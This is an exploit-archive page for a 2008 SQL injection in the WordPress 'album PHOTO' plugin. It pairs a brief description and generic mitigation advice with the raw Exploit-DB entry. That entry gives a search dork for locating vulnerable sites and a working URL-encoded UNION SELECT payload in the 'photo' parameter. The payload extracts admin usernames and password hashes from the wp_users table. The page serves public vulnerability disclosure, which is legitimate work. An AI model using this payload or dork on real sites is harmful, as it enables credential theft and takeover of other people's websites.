header-logo
Suggest Exploit
vendor:
album PHOTO
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: album PHOTO
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

WordPress album PHOTO SQL Injection

An attacker can exploit a SQL injection vulnerability in WordPress album PHOTO to gain access to the user login and password of the admin user. The exploit is achieved by sending a specially crafted HTTP request containing malicious SQL code to the vulnerable application. The malicious code is sent in the 'photo' parameter of the vulnerable page.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Developers should also use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###############################################################
#
# WordPress album PHOTO SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: page_id album "photo"
#
################################################################
EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT

S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201

################################################################
# S@BUN           i AM NOT HACKER            S@BUN
################################################################

# milw0rm.com [2008-02-16]